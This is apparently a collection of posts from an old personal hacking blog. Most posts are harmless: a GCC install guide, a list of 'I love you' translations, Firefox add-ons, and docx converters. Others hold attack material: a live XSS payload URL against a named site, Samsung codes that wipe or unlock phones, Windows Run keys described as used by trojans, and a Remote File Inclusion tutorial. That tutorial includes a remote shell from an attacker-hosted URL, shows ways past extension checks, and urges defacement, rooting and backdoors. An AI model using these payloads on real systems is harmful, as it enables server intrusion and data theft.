In the video, I have demonstrated the exploiting of the windows by adding the user account using the shell in the server.

Download Video From HERE

Happy Hacking :)

Read more...

Installing GCC with Mingw Automated Installer

The beginners might always be stuck on how to install GCC suite in their windows so this post might prove useful for such beginners. GCC is a very popular open source compiler suite that is widely used by open source guys. Its pretty flexible, robust and secure compiler.


In order to install GCC in windows, you can either use CYGWIN port of windows or MINGW port for windows. Both are easy to install but in this post, I'm going to be specific about MINGW because thats what I'm using in my PC.

You'll have to download MINGW-GET installer.

Next run the installer file and you'll reach the following stage of your installation:

Select the required compilers from there and click on Next and finish the installation. The installer will download necessary files from its online repository and you'll have the GCC suite installed in your Windows.

Read more...

Adding programs to Startup in Windows

This time, I am going to discuss on few methods of adding the programs to the startup in windows. My descriptions will be based on Windows XP machine and I hope you will find this information useful. Here I'll list out few such methods to add programs to startup in windows.

1. Startup folder: One of the simplest method of adding programs in startup, it provides easy and detectable method of adding any program to startup. For the user Administrator, the startup folder in Windows XP is located at:

C:\Documents and Settings\Administrator\Start Menu\Programs

So for any user you can find startup folder at

C:\Documents and Settings\{Username}\Start Menu\Programs

Replace the {Username} by the username you want.

2) Registry editing: Registry editing is another powerful method of adding programs in startup and is one of the most popular methods for adding virii and trojans in startup.
The following registry paths can contain the string to the path of the executable to be run at startup

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]

Similarly, you'll find similar registry paths for HKEY_CURRENT_USER. All you have to do is add new string of type REG_SZ containing the path of the executable.

3) Autoexec.bat: Root folder of your windows installation will consist of a file called autoexec.bat which can be edited to add any program in startup. Open the autoexec.bat file and add the path of the executable in the autoexec.bat file.

There are other methods too such as editing win.ini and system.ini editing. I leave them for you to google. Have fun. :)

Read more...

Escape simple game

I found this game when I was searching for something in google. I tried to cross 18 secs but could not achieve that... Anyway, you may want to try it...
Check the game HERE

Have fun...

Read more...

I Love You in different languages

A non-technical post in the blog, I thought to share what I found on the net. This post lists the translation of "I Love You" in different languages. Please send any other translation you know and I'll be adding them here...

ABÉ	mon ko lo fon
ABOURÉ	u'm wloloho
AFAR	ko kicinio
AFRIKAANS	ek het jou lief / ek is lief vir jou
ALBANIAN	të dua
ALSATIAN	ich hab die lieb
AMHARIC	afekirahalehu (woman to man) / afekirishalehu (man to woman)
Dialectal ARABIC (North African)	n'bghick
Dialectal ARABIC (Eastern)	bahebbak (to a man) / bahebbik (to a woman)
Literary ARABIC	أُحِبُّكَ (ouhibbouka) - to a man أُحِبُّكِ (ouhibbouki) - to a woman
Tunisian ARABIC	nhebbik
ARMENIAN	Ես Քեզ սիրում եմ (yes kez siroum em)
ASTURIAN	quiérote
ATIKAMEKW	ki sakihitin
ATTIÉ	min bou la yé
AZERI	men seni sevirem
BAMBARA	né bi fè
BAOULE	mi klôa
BASHKIR	мин хинэ яратау (min khine yaratau)
BASQUE	maite zaitut
BASSA	me gwes wè
BELARUSIAN	Кахаю цябе (kahaju ciabie)
BENGALI	aami tomakey bhalo bashi
BERBER	hamlagh-kem (to a woman) / hamlagh-k (to a man)
BOBO	ma kia bé nà
BOSNIAN	volim te
BRETON	karout a ran ac'hanout / da garout a ran / me az kar
BULGARIAN	обичам те
BURMESE
BUSHI-NENGÉ TONGO	mi lobi you
CATALAN	t'estimo
CH'TI	j't'aquiers
CHAMORRO	hu guiya hao
CHECHEN	sun ho ez (to a woman) sun ho vez (to a man)
CHEROKEE	gvgeyui
CHEYENNE	ne'mehotatse
CHINESE (MANDARIN)	我爱你 (wo ai ni)
CORSICAN	amu tè / ti tengu cara (to a woman) / ti tengu caru (to a man)
CROATIAN	volim te
CZECH	miluji tě
DAKOTA	chantechiciya
DANISH	jeg elsker dig
DARI	man tu ra dost darom
DIOULA	m'bi fê
DOUALA	na tondi wa
DUTCH	ik houd van jou / ik hou van je
ENGLISH	I love you
ESPERANTO	mi amas vin
ESTONIAN	ma armastan sind
EWE	me lonwo
EWONDO	ma ding wa
FANG	ma dzing wa / ma gnôre wa
FAROESE	eg elski teg
FINNISH	minä rakastan sinua
FLEMISH (WESTERN)	'k zien je geeren
FON	un nyi wan nu we
FRENCH	je t'aime
FRISIAN	ik hâld fan dy
FRIULAN	o ti vuei ben
FULA	mido yidouma
GALICIAN	amo-te / ámote / quero-te / quérote
GALLO	j'sea un diot do tae
GBAYA	mi ko me
GEORGIAN	me shen mikvarxar
GERMAN	ich liebe Dich
GREEK	Σ' αγαπώ (s'agapo)
GUARANÍ	rojhayhû
GUJARATI	hun tane prem karun chhun
HAITIAN CREOLE	mwen renmen'w / mouin rinmin'w
HAUSA	ina sonki (man to woman) ina sonka (woman to man)
HAWAIAN	aloha wau iā ‘oe
HEBREW	ani ohev otakh (man to woman) ani ohevet otkha (woman to man)
HINDI	main tumse pyar karta hoo (man to woman> mai tumse pyar karathi hun (woman to man)
HMONG	kuv hlub koj
HUNGARIAN	szeretlek
ICELANDIC	ég elska þig
INDONESIAN	saya cinta padamu / saya cinta kamu
INUKTITUT (KALAALLISUT)	asavakkit
IRISH GAELIC	tá grá agam duit
ITALIAN	ti amo
JAPANESE	aishitemasu / aishiteru (barely used) anata ga daisuki desu ("cute")
KABYLIAN	hamlagh-kem (man to woman) hamlaghk (woman to man)
KANNADA	naanu ninnanna pritisutteney
KAZAKH	myen syeni sooyom / myen syeni zhaksi koryem
KHMER	bang srolaïgn ôn (man to woman) ôn srolaïgn bang (woman to man)
KIKONGO	mu me zola nge
KIKUYU	ningwendete
KILUBAKAT	ami nkuswele
KINYARWANDA	ndagukunda
KIRGHIZ	men seni sueum
KIRUNDI	ndagukunda
KOREAN	saranghe
KURDISH	ez te hez dikim
LAO	khoi hak tchao lai
LATIN	te amo
LATVIAN	es tevi mīlu
LIGURIAN	mi te amu / t'amo / t'amu
LINGALA	na lingi yo
LITHUANIAN	aš tave myliu
LOW SAXON	ik hou van ju
LUSOGA	nkwendha
LUXEMBOURGEOIS	ech hun dech gäer
MACEDONIAN	te sakam (courant) / te ljubam (littéraire)
MALAGASY	tiako ianao / tia anao aho (stronger)
MALAY	aku cinta padamu
MALAYALAM	enikku ninné ishtamaanu
MALTESE	inħobbok
MANX	ta graih aym ort
MAORI	kei te aroha au i a koe
MARATHI	majha tujhyavar prem aahe / mi tujhyavar prem karto
MARQUESAN	hinenao au ia oe
MAURITIAN CREOLE	mo konten twa
MBO	mi ding wo
MINA	un lon o
MONGOLIAN	Би чамд хайртай (bi chamd khairtai)
MORÉ	mam nong-a fo
MUNUKUTUBA	mu zola ngé
NAPOLETANO	te voglio bene
NDEBELE	niya ku tanda
NEPALI	ma timilai prem garchhu
NORWEGIAN	jeg elsker deg
OCCITAN	t'aimi
OSSETIAN	æз дæ уарзын (æž dæ waržyn)
PAPIAMENTU	mi ta stima bo
PERSIAN	دوستت دارم (dustat dâram - formal) / duset dâram (informal)
POLISH	kocham cię
PORTUGUESE	amo-te / eu te amo (Brazilian Portuguese)
PUNJABI	mein tenu pyar karda han (male speaker) mein tenu pyar kardi han (female speaker)
QUECHUA de CUZCO	munakuyki
RAPA NUI	hanga rahi au kia koe
ROMANI	kamaù tut
ROMANIAN	te iubesc
RUSSIAN	Я тебя люблю (ya tebya l'ubl'u)
SAMOAN	ou te alofa ia te oe
SANGO	mbi yé mô
SANSKRIT	स्निह्यामि त्वयि (snihyāmi tvayi)
SARDINIAN	deo t’amo (logudorese) / deu t’amu (campidanese)
SCOTTISH GAELIC	tha gaol agam ort / tha gaol agam oirbh
SENUFO	mô mi dènè
SERBIAN	я те волим (ja te volim) / волим те (volim te)
SESOTHO	ke ya ho rata
SHIBUSHI	anaou tiakou / zahou mitiya anaou
SHIKOMORI	ngam hwandzo
SHIMAORE	ni su hu vendza
SHONA	ndinokuda
SINDHI	moon khay tu saan piyar aahay
SINHALA	mama oyata aadareyi (spoken) / mama obata aadareyi (formal)
SLOVAK	ľúbim ťa / milujem ťa
SLOVENIAN	ljubim te / rad te imam (male speaker) / rada te imam (female speaker)
SOBOTA	volim te / se te volime (lit.)
SOMALI	waan ku jecelahay
SONHRAÏ	aye go bani
SONINKÉ	na moula
SPANISH	te amo / te quiero
SUSU	ira fan ma
SWAHILI	nakupenda
SWEDISH	jag älskar dig
TAGALOG	mahal kita / ini-ibig kita
TAHITIAN	ua here vau ia oe
TAJIKI	jigarata bihrum duhtari hola (man to woman) tra lav dorum (woman to man)
TAMIL	naan unnai kadalikiren
TATAR	мин сини яратам (min sini yaratam)
TELUGU	nenu ninnu premisthunnanu
TETUN	hau hadomi o
THAI	ผมรักคุณ (phom rak khun) - man speaking ฉันรักคุณ (chan rak khun) - woman speaking
TIBETAN	na kirinla gaguidou
TIGRIGNA	ye fikireka eye (woman to man) / ye fikireki eye (man to woman)
TONGAN	ofa atu
TSHILUBA	ndji mukunanga
TURKISH	seni seviyorum
TURKMEN	seni söýärin
TUVAN	мэн сэни ынакшир (men seni ynakshir)
UDMURT	mon tone jaratiśko
UKRAINIAN	Я тебе кохаю (ia tebe kohaiu)
URDU	mein tumse mohabbat karta hoon (man to woman) main tumse mohabbat karti hoon (woman to man) mujhe tum se pyar heh
UZBEK	men seni sevaman / men seni yahshi ko'raman (less formal)
VALENCIAN	te vullk
VENETIAN	t'amo
VEPS	minä armastan sindai
VIETNAMESE	anh yêu em (man to woman) em yêu anh (woman to man)
VUTE	ma wou ndoune
WALLISIAN	eau manako ia koe / eau ofa ia koe
WALOON (orthographe à betchfessîs)	dji vs voe voltî
WELSH	rydw i'n dy garu di
WEST INDIAN CREOLE	mwen enmen'w
WOLOF	damala nob / damala beug
XHOSA	ndiyakuthanda
YAKUT	Мин эйиигин таптыыбын (min eyiigin taptyybyn)
YEMBA	men nkon' wou
YENICHE	y hob ti
YIDDISH	ich hob dir lib
YIPUNU	ni wu rondi
YORUBA	moni ife e
ZULU	ngiyakuthanda

Read more...

Nepali Hack Challenge Site

I had to develop a reversing challenge site for KU IT Meet 2010 organized by Kathmandu University Computer Club in IT Park, Panauti Road. The challenge was done by few great hackers from Nepal like fr3ak, dpac_, etc. and they finished around 90% of the challenges. But other users were far behind in the challenge so now I want to make this challenge open for everyone.

If you want to participate in the Reversing challenge, you can visit www.nepali.netau.net. The site is pretty basic in its interface and design as it had to be done very quickly. But still this site might prove useful for some of you to learn hacking as the challenges in the site will guide you to read the related hacking and security articles by searching on your own on google. So I hope you will have fun doing these challenges.

Click to visit the site

If you need any sort of help regarding the challenges, you can always contact me. Best of luck for the challenges.

Read more...

Few Online Docx to Doc conversion

With the release of the Microsoft Office 2007, the new XML formats were implemented for the office documents and the new file extensions with the added letter x were created, such as .docx, .pptx, .xlsx, etc. But, this new file format creates problem when the older versions of Microsoft Office are widely in use as the file formats such as .docx can't be opened by the older versions.

And, today I had the same problem when I had received the proposal sample of .docx format and had to open in my microsoft word 2003. Then, I started searching for the online conversion tools for converting .docx to .doc
While searching, I found some working websites for the conversion.

www.zamzar.com: This site offers you the conversion of various file formats including .docx to .doc. The service worked perfectly for me... Check the service at www.zamzar.com

Docx2Doc: This free web service allows you to convert Docx file format into Doc file by uploading your docx file and lets you download the converted doc file. Check the service at www.docx2doc.com

Edit*
http://docx-converter.com/: This service also allows you to convert .docx file format to .doc. Check it at docx-converter.com

If you happen to know any other such online converters, be sure to comment. I'll add them here.

Read more...

Ziddu.com Vulnerable to XSS

Today, I was trying to download some file from ziddu and since the author had already deleted the file, I was redirected to the error message page. And I thought of playing around with the message from GET params which was being displayed into the page.

I first added <i> and </i> in between the message and found that the HTML tags were not being filtered. Then I used the <script> tag and tried to do the alert but they were adding backslashes in the single and double quotes...
Then I used the String.fromCharCode() JS function and the alert appeared in the site..

http://www.ziddu.com/errortracking.php?msg=%3Cscript%3Ealert%28String.fromCharCode%2883,65,77,65,82%29%29;%3C/script%3E

Ziddu.com suffers from the XSS and I've notified them.

Read more...

Usefull firefox plugins

The Firefox Web Browser is the faster, more secure, and fully customizable way to surf the web. Moreover, it has got thousands of extensions to improve and optimize various aspects of this cool web browser. So lets talk about some useful extensions you will want to have with your firefox browser.

1) Customize google(www.customizegoogle.com): If you use Google, this extension will save you hours of your time over the long run. Download this extension, go to options, and enable streaming search results. You will never ever have to press the Next button after seeing every 10 search results. This will increase your productivity at least 2 times when searching because in the same time it would have previously taken for you to click on the Next button and wait for more results, you now will already have seen the next 10 results, decided what to do and moved on. Extremely useful extension.

2) Fasterfox(http://fasterfox.mozdev.org): Loads faster web pages by prefetching parts. Renders a small page timer counting in seconds.

3) Performancing (http://performancing.com): Excellent extension for bloggers, Performancing, allows you to instantly blog comments you made to any of the major blog systems, or even your own (if your blog supports Moveable Type or WordPress).

4) WebDeveloper (http://chrispederick.com/work/webdeveloper): My personal favourite, it is a Very useful extension for web developers. It creates a toolbar menu with 100s of useful options.

5) NoScript: An absolute must have security addon for your browser, NoScript gives you the power to specify the sites you trust and only those sites will be allowed to run active content like Javascript, Java code and other executable code. The addon thus protects you from cross-site scripting attacks and clickjacking attacks.

6) FoxyProxy: FoxyProxy automatically switches an internet connection across one or more proxy servers based on URL patterns and switching rules defined by you.

7) Facepad: I was thinking of trying to develop a facebook photo downloader addons and I found one to be already existing on the net. This addon allows you to download whole photo album of your friends. My previous post on this is availabe HERE

8) Adblock Plus: It will filter out hundreds of ads when you surf webpages. Webpages will load cleaner, faster, and will have almost zero ads. If you support the blogger you are reading, you can turn off adblock plus for sites you support with one click.

You will be able to get all these addons from https://addons.mozilla.org/en-US/firefox/ the official mozilla's addons site.

Read more...

Collection of Samsung Command Codes

I was searching for the E250 java games and while I was searching, I came through the list of the codes for my samsung E250 and I checked few of them and found them working. This post lists the collection of the samsung mobile command codes you might be interested in. The credit goes to the one who posted all these.

The following is the list of all the commands for the samsung mobile. Few are tested in samsung E250 and I think they should work in one or another samsung cellphones.

*#1111# S/W Version
*#1234# Firmware Version
*#2222# H/W Version
*#8999*8376263# All Versions Together

*#8999*8378# Test Menu
*#4777*8665# GPSR Tool
*#8999*523# LCD Brightness
*#8999*377# Error Menu
*#8999*327# EEP Menu
*#8999*3825523# Don't Know.
*#8999*667# Debug Mode
*#92782# PhoneModel (Wap)
#*5737425# JAVA Mode
*#2255# Call List
*#232337# Bluetooth MAC Adress
*#5282837# Java Version

#*4773# Incremental Redundancy
#*7752# 8 PSK uplink capability bit
#*7785# Reset wakeup & RTK timer cariables/variables
#*1200# ????
#*7200# Tone Generator Mute
#*3888# BLUETOOTH Test mode
#*#8999*324# ??
#*7828# Task screen
#*5111# ??
#*#8377466# S/W Version & H/W Version
#*2562# Restarts Phone
#*2565# No Blocking? General Defense.
#*3353# General Defense, Code Erased.
#*3837# Phone Hangs on White screen
#*3849# Restarts Phone
#*3851# Restarts Phone
#*3876# Restarts Phone
#*7222# Operation Typ: (Class C GSM)
#*7224# !!! ERROR !!!
#*7252# Operation Typ: (Class B GPRS)
#*7271# CMD: (Not Available)
#*7274# CMD: (Not Available)
#*7337# Restarts Phone (Resets Wap Settings)
#*2787# CRTP ON/OFF
#*2886# AutoAnswer ON/OFF
#*3737# L1 AFC
#*5133# L1 HO Data
#*7288# GPRS Detached/Attached
#*7287# GPRS Attached
#*7666# White Screen
#*7693# Sleep Deactivate/Activate
#*7284# L1 HO Data
#*2256# Calibration info? (For CMD set DEBUGAUTONOMY in cihard.opt)
#*2286# Databattery
#*2527# GPRS switching set to (Class 4, 8, 9, 10)
#*2679# Copycat feature Activa/Deactivate
#*3940# External looptest 9600 bps
#*4263# Handsfree mode Activate/Deactivate
#*4700# Please use function 2637
#*7352# BVMC Reg value (LOW_SWTOFF, NOMINAL_SWTOFF)
#*2558# Time ON
#*3370# Same as 4700
#*3941# External looptest 115200 bps
#*5176# L1 Sleep
#*7462# SIM Phase
#*7983# Voltage/Freq
#*7986# Voltage
#*8466# Old Time
#*2255# Call Failed
#*5187# L1C2G trace Activate/Deactivate
#*5376# DELETE ALL SMS!!!!
#*6837# Official Software Version: (0003000016000702)
#*7524# KCGPRS: (FF FF FF FF FF FF FF FF 07)
#*7562# LOCI GPRS: (FF FF FF FF FF FF FF FF FF FF FF FE FF 01)
#*2337# Permanent Registration Beep
#*2474# Charging Duration
#*2834# Audio Path (Handsfree)
#*3270# DCS Support Activate/Deactivate
#*3282# Data Activate/Deactivate
#*3476# EGSM Activate/Deactivate
#*3676# FORMAT FLASH VOLUME!!!
#*4760# GSM Activate/Deactivate
#*4864# White Screen
#*5171# L1P1
#*5172# L1P2
#*5173# L1P3
#*7326# Accessory
#*7683# Sleep variable
#*8465# Time in L1
#*2252# Current CAL
#*2836# AVDDSS Management Activate/Deactivate
#*3877# Dump of SPY trace
#*7728# RSAV
#*2677# Same as 4700
#*3797# Blinks 3D030300 in RED
#*3728# Time 2 Decod
#*3725# B4 last off
#*7372# Resetting the time to DPB variables
#*7732# Packet flow context bit Activate/Deactivate
#*6833# New uplink establishment Activate/Deactivate
#*3273# EGPRS multislot (Class 4, 8, 9, 10)
#*7722# RLC bitmap compression Activate/Deactivate
#*2351# Blinks 1347E201 in RED
#*4472# Hysteresis of serving cell: 3 dB
#*2775# Switch to 2 inner speaker
#*9270# Force WBS
#*7878# FirstStartup (0=NO, 1=YES)
#*3757# DSL UART speed set to (LOW, HIGH)
#*8726# Switches USBACM to Normal
#*8724# Switches USBACM to Generator mode
#*8727# Switches USBACM to Slink mode
#*8725# Switches USBACM to Loop-back mode
#*3838# Blinks 3D030300 in RED
#*2077# GPRS Switch
#*2027# GPRS Switch
#*0227# GPRS Switch
#*0277# GPRS Switch
#*22671# AMR REC START
#*22672# Stop AMR REC (File name: /a/multimedia/sounds/voice list/ENGMODE.amr)
#*22673# Pause REC
#*22674# Resume REC
#*22675# AMR Playback
#*22676# AMR Stop Play
#*22677# Pause Play
#*22678# Resume Play
#*77261# PCM Rec Req
#*77262# Stop PCM Rec
#*77263# PCM Playback
#*77264# PCM Stop Play
#*2872# CNT
*#8999*283# ???
#*22679# AMR Get Time
*288666# ???
*2886633# ???
*#8999*364# Watchdog ON/OFF
#*8370# Tfs4.0 Test 0
#*8371# Tfs4.0 Test 1
#*8372# Tfs4.0 Test 2
#*8373# Tfs4.0 Test 3
#*8374# Tfs4.0 Test 4
#*8375# Tfs4.0 Test 5
#*8376# Tfs4.0 Test 6
#*8377# Tfs4.0 Test 7
#*8378# Tfs4.0 Test 8
#*8379# Tfs4.0 Test 9
#837837# error=...

#*36245# Turns Email TestMenu on.

*2767*22236245# Email EPP set (....)!
*2767*837836245# Email Test Account!
*2767*29536245# Email Test2 Account!
*2767*036245# Email EPP reset!
*2767*136245# Email EPP set (1)!
*2767*736245# Email EPP set (7)!
*2767*3036245# Email...
*2767*3136245# Email...
*2767*3336245# Email...
*2767*3436245# Email...
*2767*3936245# Email...
*2767*4136245# Email...
*2767*4336245# Email...
*2767*4436245# Email...
*2767*4536245# Email...
*2767*4636245# Email...
*2767*4936245# Email...
*2767*6036245# Email...
*2767*6136245# Email...
*2767*6236245# Email...
*2767*6336245# Email...
*2767*6536245# Email...
*2767*6636245# Email...
*2767*8636245# Email...
*2767*85236245# Email...

*2767*3855# = E2P Full Reset
*2767*2878# = E2P Custom Reset
*2767*927# = E2P Wap Reset
*2767*226372# = E2P Camera Reset
*2767*688# Reset Mobile TV
#7263867# = RAM Dump (On or Off)
*2767*49927# = Germany WAP Settings
*2767*44927# = UK WAP Settings
*2767*31927# = Netherlands WAP Settings
*2767*420927# = Czech WAP Settings
*2767*43927# = Austria WAP Settings
*2767*39927# = Italy WAP Settings
*2767*33927# = France WAP Settings
*2767*351927# = Portugal WAP Settings
*2767*34927# = Spain WAP Settings
*2767*46927# = Sweden WAP Settings
*2767*380927# = Ukraine WAP Settings
*2767*7927# = Russia WAP Settings
*2767*30927# = GREECE WAP Settings
*2767*73738927# = WAP Settings Reset
*2767*49667# = Germany MMS Settings
*2767*44667# = UK MMS Settings
*2767*31667# = Netherlands MMS Settings
*2767*420667# = Czech MMS Settings
*2767*43667# = Austria MMS Settings
*2767*39667# = Italy MMS Settings
*2767*33667# = France MMS Settings
*2767*351667# = Portugal MMS Settings
*2767*34667# = Spain MMS Settings
*2767*46667# = Sweden MMS Settings
*2767*380667# = Ukraine MMS Settings
*2767*7667#. = Russia MMS Settings
*2767*30667# = GREECE MMS Settings

*#7465625# = Check the locks
*7465625*638*Code# = Enables Network lock
#7465625*638*Code# = Disables Network lock
*7465625*782*Code# = Enables Subset lock
#7465625*782*Code# = Disables Subset lock
*7465625*77*Code# = Enables SP lock
#7465625*77*Code# = Disables SP lock
*7465625*27*Code# = Enables CP lock
#7465625*27*Code# = Disables CP lock
*7465625*746*Code# = Enables SIM lock
#7465625*746*Code# = Disables SIM lock
*7465625*228# = Activa lock ON
#7465625*228# = Activa lock OFF
*7465625*28638# = Auto Network lock ON
#7465625*28638# = Auto Network lock OFF
*7465625*28782# = Auto subset lock ON
#7465625*28782# = Auto subset lock OFF
*7465625*2877# = Auto SP lock ON
#7465625*2877# = Auto SP lock OFF
*7465625*2827# = Auto CP lock ON
#7465625*2827# = Auto CP lock OFF
*7465625*28746# = Auto SIM lock ON
#7465625*28746# = Auto SIM lock OFF

I will be posting such command codes for other mobile phones too... Hope this helps. :)

Read more...

Steal your buddy's MSN display pic

I don't know how well this works but it worked well for me... Extra note that I'm using msgplus addon on my windows live so I am not sure about the native Windows live messenger. Anyway I thought it would be worth sharing here.


I was actually looking for the malware that apparently was running from the temporary folder of my computer. So I went to the temporary folder by typing

%temp%

There I found the folder MessengerCache and then to kill my curiosity, I browsed inside the folder and found some files with their name in base64 encoded format(probably) like:

5MUxRvUiwvrxjV2LPv16yrBUhKs=
fffaxlzPZXqjTQMBjaQqrIhOQtc=
RMsNq5KjYXJA2LKOCzpJX2FY4Wzo=
etc...

I then opened one of these files in notepad++ and found the starting of the file containing

GIF89a

which is something like header for the GIF images. Immediately I renamed the file into .gif and when I viewed it, I found it to be display pic of one of the friends in my buddy list. I hope you got me... This is something like stealing buddy's display pic. Have fun. :)

Read more...

Basic on Remote File Inclusion[RFI]

This time, I am going to give you information about the remote file inclusion vulnerability in the webpages which can be compromised to root and mass the server.
First, let me say what remote file inclusion(RFI) is... File inclusion vulnerability is the result of poor & insecure programming practice which allows us to include the files in the website's php scripts. Now, whenever I say remote file inclusion, the file that is going to be included is from different server. Simple, you would include some evil file with malicious code from another server in the victim site you are hacking. Such evil file is called shell and should be in .txt format so as to get executed in the victim site. There are numerous shells available on the internet. Google for r57 or c99 shell and you should get the shells. Now you need to upload these shells to the server(free hosting providers) with .txt extension.


Let me suppose, I am browsing a site www.victim.com & notice in the URL(in address bar) that one of the GET arguments is index.php?page=home.php. I click on the link & it changes to index.php?page=game.php

    Example:

        http://www.victim.com/index.php?page=home.php
        http://www.victim.com/index.php?page=game.php

Let me show you the code for index.php that makes it vulnerable to RFI.

    <?php
     $mypage=$_GET['page'];
     include($mypage);
    ?>

So, the code sets $mypage to $_GET['page'] & whenever we go to http://www.victim.com/index.php?page=game.php, game.php file is included by include() function i.e. the content of blog.php is pasted into index.php
But this allows malicious attacker to include remote files also. I mean, if you put:

    http://www.victim.com/index.php?page=http://www.yoursite.com

 you will see the content of your site on the site.

Now you got the idea of remote file inclusion, its time to exploit it. So we use evil scripts called shells which provide us the interface of viewing, deleting & editing files, getting server info & much more.

Say, I've uploaded my shell in free hosting provider & the URL(location) of my shell is http://www.hacky0u.free.com/lol.txt, I would do:

    http://www.victim.com/index.php?page=http://www.hacky0u.free.com/lol.txt

Now, with this I get shell on the server & can do anything from deleting files to stealing the informations from there.
But sometimes, programmers write codes like below:

    <?php
     $mypage=$_GET['page'];
     include($mypage.".php");
    ?>

So if we have index.php?page=game, the game.php file is getting included. So this seems to include only php files & our .txt shell file won't get included instead it would include .txt.php making us fail. But, if we add "?" this gets bypassed & we can still gain shell. Similarly, if ? doesn't work, you can injection nullbyte() in place of ? that denotes end of the string.

    Example: http://www.victim.com/index.php?page=http://www.hacky0u.free.com/lol.txt?

After getting shell, we may delete files, do mass defacements, gain root access using root exploits, keep backdoors, install r00tkits,etc. & etc. Seems elite but you can learn all these things.
Now, something about avoiding RFI... If you are a web programmer, the you should know the switch-case-default statement. Use it for the navigation to the pages instead of above shown scripts. Switch is simple yet the best solution.
Learn it, hack it & enjoy it...
Read more...